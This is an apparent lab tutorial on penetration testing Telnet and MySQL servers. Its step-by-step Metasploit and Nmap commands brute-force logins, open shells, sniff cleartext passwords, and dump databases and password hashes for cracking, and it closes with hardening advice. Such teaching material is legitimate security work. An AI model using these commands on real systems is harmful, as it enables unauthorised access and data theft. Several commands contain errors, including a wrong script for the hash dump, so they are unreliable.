Penetration Testing on Telnet (Port 23)

Welcome to Internal penetration testing on telnet server where you will learn telnet installation and configuration, enumeration and attack, system security and precaution.  

From Wikipedia

 Telnet is a protocol used on the Internet or local area networks to provide a bidirectional interactive text-oriented communication facility using a virtual terminal connection. This protocol is used to establish a connection to Transmission Control Protocol (TCP) port number 23, where a Telnet server application (telnetd) is listening.

Let’s start!!!

Requirement

Telnet Server: ubuntu

Attacker system: Kali Linux

Telnet Installation & Configuration in 3 steps

Installing telnet server is very simple, it will get activated by following three steps:

1)      Open the terminal in ubuntu and type given below command with root access.

apt-get install xinted telnet

1    Open ineted.conf file add given below statement inside it, then save it.

gedit /etc/inetd.conf

telnet stream tcp nowait telnetd /usr/sbin/tcpd /usr/sbin/in.telnetd

     Now open xibetd.conf and add following line for configuration setting and save it.

gedit /etc/xinetd.conf

# Simple configuration file for xinetd

#

# Some defaults, and include /etc/xinetd.d/

defaults

{

# Please note that you need a log_type line to be able to use log_on_success

# and log_on_failure. The default is the following :

# log_type = SYSLOG daemon info

instances = 60

log_type = SYSLOG authpriv

log_on_success = HOST PID

log_on_failure = HOST

cps = 25 30

}

includedir /etc/xinetd.d

Now execute following command to restart the service.

sudo /etc/init.d/xinetd restart

Now you can ensure whether telnet service is getting activated or not and for this we had scan our own system with nmap.

nmap –p 23 127.0.0.1

If service is activated in targeted server then nmap show open STATE for port 23.

SSH Banner grabbing through telnet

A telnet play an important role in banner grabbing of other service running on target system. Open the terminal in kali Linux and type following command for finding the version of SSH service running on targeted machine.

telnet 192.168.0.106 22

From given image you can observe that it has successfully shown the SSH version “2.0-openSSH_6.6.1p1”has been installed on target machine.

SMTP Banner grabbing through telnet

Similarly we can also find out version and valid user of SMTP server using telnet. Execute following command and find out its version and valid user.

telnet 192.168.0.25 25

From given image you can observe that it has successfully shown “220 mail.ignite.lab ESMTP Postfix” has been installed on target machine.

You can guess for valid user account through following command and if you receive response code 550 it means unknown user account:

vrfy raj@mail.lab.ignite

If you received message code 250,251,252 which means server has accept the request and user account is valid.

But if you received message code 550 it means invalid user account as shown in given image

vrfy raaz@mail.ignite.lab

Telnet Banner Grabbing through Metasploit

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for TELNET version.

use auxiliary/scanner/telnet/telnet_version

msf auxiliary(telnet_version) > set rhosts 192.168.0.106

msf auxiliary(telnet_version) > set rport 23

msf auxiliary(telnet_version) >set threads 5

msf auxiliary(telnet_version) > exploit

From given image you can read the highlighted text which is showing the installed version of TELNET on target’s system.

Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.

Now type following command to Brute force TELNET login:

use auxiliary/scanner/telnet/telnet_login

msf auxiliary(telnet_login) > set rhosts 192.168.0.106

msf auxiliary(telnet_login) > set user_file /root/Desktop/user.txt

msf auxiliary(telnet_login) > set pass_file /root/Desktop/pass.txt

msf auxiliary(telnet_login) > set stop_on_success true

msf auxiliary(telnet_login) > exploit

From given image you can observe that our TELNET server is not secure against brute force attack because it is showing matching combination of username: raj and password: 123 for login simultaneously it has opened victims command shell as session 1.

From given image you can see now we have unauthorized access on victim’s system as raj@ignite and executed ifconfig to verify the network interface.

We can also convert command shell into meterpreter shell using following command

sessions –u 1

From given image you can see that now we are having two sessions; 1^st for command shell session and 2^nd for meterpreter session.

Stealing credential through sniffing

Telnet, by default, does not encrypt any data sent over the connection (including passwords), and so it is often feasible to eavesdrop on the communications and use the password later for malicious purposes; anybody who has access the network between the two hosts where Telnet is being used can intercept the packets passing between source and destination and obtain login, password and data information.

From given image you can observe that here the client is login into telnet server by submitting valid credential on other hand attacker is sniffing network packet using wireshark  or other tools.

Here you can notice wireshark had captured telnet information by sniffing the network. It follow similar protocol as FTP where telnet users may authenticate themselves with a clear-text sign-in protocol for username and password. As result attacker can esaly sniff login credential.

From given below image you can read the username: raj and password: 123 moreover complete information travelling through packet between source to destination.

Since Telnet implementations do not support Transport Layer Security (TLS) security and Simple Authentication and Security Layer (SASL) authentication extensions. Therefore in favor of that the Secure Shell (SSH) protocol, first released in 1995 in replaced of Telnet.

Secure Telnet through Port forwarding

In order to secure telnet server admin can forward port from default to specific port to run the service. Open services file using following command for making changes:

gedit /etc/services

From given image you can perceive that telnet default uses port 23 for its services; change the port number for telnet service.

 From given below image you can compare that we had changed port 23 with 2323, now restart the service.

service xinetd restart

Verify it using nmap command as given below:

nmap –p 2323 –sV 192.168.0.106

Secure telnet against brute force attack

You can secure telnet server against brute force and from unauthorized access by adding filter using Iptable. Allow only specific IP address to establish connection with telnet server and reject or drop the connection from other IP addresses.

Now type following command with root permission to add filter for telnet in iptables.

Iptables –A INPUT –s 192.168.0.104 –p tcp –dport 23 –j ACCEPT

Above command will allow the traffic from IP address 192.168.0.104 to access the telnet service on port 23.

Iptables –A INPUT –p tcp –dport 23 –j DROP

Above command with drop the service for traffic coming from other IP addresses on port 23.

Restart the service once you add filter in iptables

sudo /etc/init.d/xinetd restart

Let verify the working of Ipatble by connecting to telnet server from client machine holding IP address 192.168.0.104.

Great!! Connection established successfully.

You can confirm it from given below image.

Let verify the working of Ipatble by connecting to telnet server from attacker machine holding different IP address.

From given below image you can see nothing is happing here because port 23 is down for all other IP addresses

Awesome!! It means if attacker sniff the valid credential then also will not able to access the telnet server.

Penetration Testing on MYSQL (Port 3306)

Hello friends!! Today we are discussing internal penetration testing on MYSQL server. In our previous article we had already discussed how to configure of mysql in ubuntu which you can read from here, now moving towards for its penetration testing.

Attacker: kali Linux

Target: ubuntu 14.04.1 (mysql server), IP: 192.168.1.216

Lets start !!

Scanning MYSQL

Scanning plays an important role in penetration testing because through scanning attacker make sure which services and open ports are available for enumeration and attack.

Here we are using nmap for scanning port 3306. 

nmap -sT 192.168.1.216

If service is activated in targeted server then nmap show open STATE for port 3306.

Enumerating MYSQL Banner

An attacker always perform enumeration for finding important information such as software version which known as Banner Grabbing and then identify it state of vulnerability against any exploit.

Open the terminal in your kali Linux and Load metasploit framework; now type following command to scan for MYSQL version.

use auxiliary/scanner/mysql /mysql _version

msf auxiliary(mysql_version) > set rhosts 192.168.1.216

msf auxiliary(mysql_version) > set rport 3306

msf auxiliary(mysql_version) > run

From given image you can read the highlighted text which is showing MYSQL 5.5.57 is the installed version of MYSQL with protocol 10 on ubuntu 14.04.1 operating system.

MYSQL Brute Force Attack

An attacker always tries to make brute force attack for stealing credential for unauthorized access.

This module simply queries the MySQL instance for a specific user/pass (default is root with blank).

msf > use auxiliary/scanner/mysql/mysql_login

msf auxiliary(mysql_login) > set rhosts 192.168.1.216

msf auxiliary(mysql_login) > set rport 3306

msf auxiliary(mysql_login) > set user_file /root/Desktop/users.txt

msf auxiliary(mysql_login) > set pass_file /root/Desktop/password.txt

msf auxiliary(mysql_login) > run

This will start brute force attack and try to match the combination for valid username and password using user.txt and pass.txt file.

From given image you can observe that our mysql server is not secure against brute force attack because it is showing matching combination of username: root and password: toor for login.

Once the attacker retrieves the valid credential he can directly login into mysql server for stealing or destroying the database information.

Stealing MYSQL information using metasploit

This module allows for simple SQL statements to be executed against a MySQL instance given the appropriate credentials.

use auxiliary/admin/mysql/mysql_sql

msf auxiliary(mysql_sql) > set rhost 192.168.1.216

msf auxiliary(mysql_sql) > set username root

msf auxiliary(mysql_sql) > set password toor

msf auxiliary(mysql_sql) > set SQL show databases;

msf auxiliary(mysql_sql) > run

From given image you can observe that it has executed the sql query for dumping the name of databases.

This module extracts the schema information from a MySQL DB server.

use auxiliary/scanner/mysql/mysql_schemadump

msf auxiliary(mysql_schemadump) >set rhosts 192.168.1.216

msf auxiliary(mysql_schemadump) >set username root

msf auxiliary(mysql_schemadump) >set password toor

msf auxiliary(mysql_schemadump) >run

here it has dump the information schema for database “ignite” with table name “student” , 5 columns name with column types:

DB: ignite

Table name: student

Last Name (varchar 30)

First Name (varchar 30)

Student ID (int 11)

Major (varchar 20)

Dorm (varchar 20)

Check file privileges

Open my.cnf file to verify file privileges using following command:

gedit /etc/mysql/my.cnf

Here you can see given below statements are uncommented

·         Mysqld_safe

·         Mysqld

·         Secure_file _priv

If these statements are uncommented then it becomes very easy for attacker to perform file enumeration.

Mysql File Eumeration

This module will enumerate files and directories using the MySQL load_file feature.

Use auxiliary/scanner/mysql/mysql_file_enum

msf auxiliary(mysql_ file_enum) > set rhosts 192.168.1.216

msf auxiliary(mysql_ file_enum) > set username root

msf auxiliary(mysql_ file_enum) > set password toor

msf auxiliary(mysql_ file_enum) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_ file_enum) > run

Here it will start identifying whether the given files list is exist in the target system or not.

From given image you can observe that it has found /etc, /var, /var/www such directory exists.

Enumerate writeable directories using the MySQL SELECT INTO DUMPFILE feature, for more information see the URL in the references. ***Note: For every writable directory found, a file with the specified FILE_NAME containing the text test will be written to the directory. ***

use auxiliary/scanner/mysql/mysql_writable_dirs

msf auxiliary(mysql_writable_dirs) > set rhosts 192.168.1.216

msf auxiliary(mysql_writable_dirs) > set username root

msf auxiliary(mysql_writable_dirs) > set password toor

msf auxiliary(mysql_writable_dirs) > set DIR_LIST/root/Desktop/file.txt

msf auxiliary(mysql_writable_dirs) > run

Here we had assign a list of files so that we can identify the writable directory and from given image you can observe that it has found writable permission only for /tmp.

Mysql User Enumeration

This module allows for simple enumeration of MySQL Database Server provided proper credentials to connect remotely.

use auxiliary/admin/mysql/mysql_enum

msf auxiliary(mysql_enum) > set rhost 192.168.1.216

msf auxiliary(mysql_enum) > set username root

msf auxiliary(mysql_enum) > set password toor

msf auxiliary(mysql_enum) > run

It will start retrieving information such as list of other user account and user privileges on mysql server.

From given image it will be clear to you, that it has shown list of account with hash password and list of user who have GRANT privileges.

As you can see other than user root it has some more user such as sr with hash password, here you can crack this password using password cracker tool.

This module extracts the usernames and encrypted password hashes from a MySQL server and stores them for later cracking.

use auxiliary/scanner/mysql/mysql_hashdump

msf auxiliary(mysql_hashdump) > set rhosts 192.168.1.216

msf auxiliary(mysql_hashdump) > set username root

msf auxiliary(mysql_hashdump) > set toor

msf auxiliary(mysql_hashdump) > exploit

Now from screenshot you can see the hash value of password is given for all users. Metasploit store these hash value inside /tmp folder and later use jonh the ripper for cracking password. 

This module uses John the Ripper to identify weak passwords that have been acquired from the mysql_hashdump module. Passwords that have been successfully cracked are then saved as proper credentials

use auxiliary/analyze/jtr_mysql_fast

 msf auxiliary(jtr_mysql_fast) >options

msf auxiliary(jtr_mysql_fast) >run

By default it will use metasploit wordlist where hash value has been saved and start cracking hash value.

If you notice the given below image you can perceive that it has successfully crack the double SHA-1 hashing and decrypt the password into plain text.

Now using above retrieved credential you can try to login into mysql server.

Here you can see we had successfully login into server. Hence attacker can easily breach the security of server and steal the important information or modify it.

Secure MYSQL through port forwarding

In order to secure mysql server admin can forward port from default to specific port to run the service. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Now change port 3306 into any other port such as 3000 as shown in given image and save the changes and restart the service.

service mysql restart

Verify it using nmap command as given below:

nmap –sT 192.168.1.216

Prevent Mysql against brute force attack

In order to secure mysql server admin can bind the service to its localhost. Open my.conf file using following command for making changes:

gedit /etc/mysql/my.conf

Only you need to enable nind-address by making it uncomment  as shown in given images.

service mysql rstart

Now let’s verify it by making brute force attack same as above using dictionary.

Great!! Attacker is not able to connect the server which resists brute attack also as shown in given image.

Admin should GRANT all privilege to a specific user only with specific IP address which prevents database information alteration from attackers.

Now for granting all privileges; login into mysql server and type following query:

Mysql> GRANT ALL PRIVILEGES ON *-* TO ‘root’@‘192.168.1.220’ IDENTIFIED BY ‘toor’ WITH GRANT OPTION;

To tell the server to reload the grant tables, perform a flush-privileges operation

Mysql > flush privileges;

MySQL Penetration Testing with NMAP

In this article we are discussing MYSQL penetration testing using Nmap where you will learn how to retrieve database information such as database name, table’s records, username, password and etc.

MySQL is an open Source for Relational Database Management System that uses structured query language for generating database record.  

Lets Begin !!!

Scanning for port 3306

open the terminal and type following command to check mysql service is activated on targeted system or not, basically mysql service is activated on default port 3306.

Nmap –sT 192.168.1.216

From given image you can observe port 3306 is open for mysql service, now lets enumerate it

Retrieve mysql information

Now type another command to retrieve mysql information such as version, protocol and etc:

Nmap –script=mysql-info 192.168.1.216

Above command try to connect to with MySQL server and hence prints information such as the protocol: 10, version numbers: 5.5.57 -0ubuntu0.14.04.1, thread ID: 159, status: autocommit, capabilities, and the password salt as shown in given below image.

Brute force attack

This command will use dictionary for username and password and then try to match the username and password combination by making brute force attack against mysql.

Nmap –p 3306 –script mysql-brute –script-args userdb=/root/Desktop.lst,passdb=/root/Desktop/pass.lst 192.168.1.216

From given image you can observe that it found the valid credential root: toor. This credential will help in directly login into MYSQL server.

Retrieve mysql user names

This command will fetch mysql users name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-users 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can see we had found four user names: root, debian-sys-maint, sr, st.

Retrieve database names

This command will fetch mysql database name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-databases 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given below image you can read the name of created database such as ignite

This command will also perform same task as above but retrieve database name using mysql query “show database”

Nmap –p 3306 192.168.1.216 –script mysql-query –script-args “query=show databases,username=root,password=toor”

From given below image you can read the name of created database such as ignite

Retrieve mysql variable status ON/OFF

When we want to pass a value from one SQL statement to another SQL statement, then we store the value in a MySQL user-defined variable.

This command will fetch mysql variables name which help of given argument mysqluser root and mysqlpass toor.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe ON/OFF status for mysql variable.

Retrieve Hash password

This command will Dumps the password hashes from a MySQL server in a format suitable for cracking by tools such as John the Ripper.

Nmap –p 3306 –script=mysql-variables 192.168.1.216 –script-args mysqluser=root,mysqlpass=toor

From given image you can observe that it has dumped the hash value of passwords of respective user which we have enumerated above.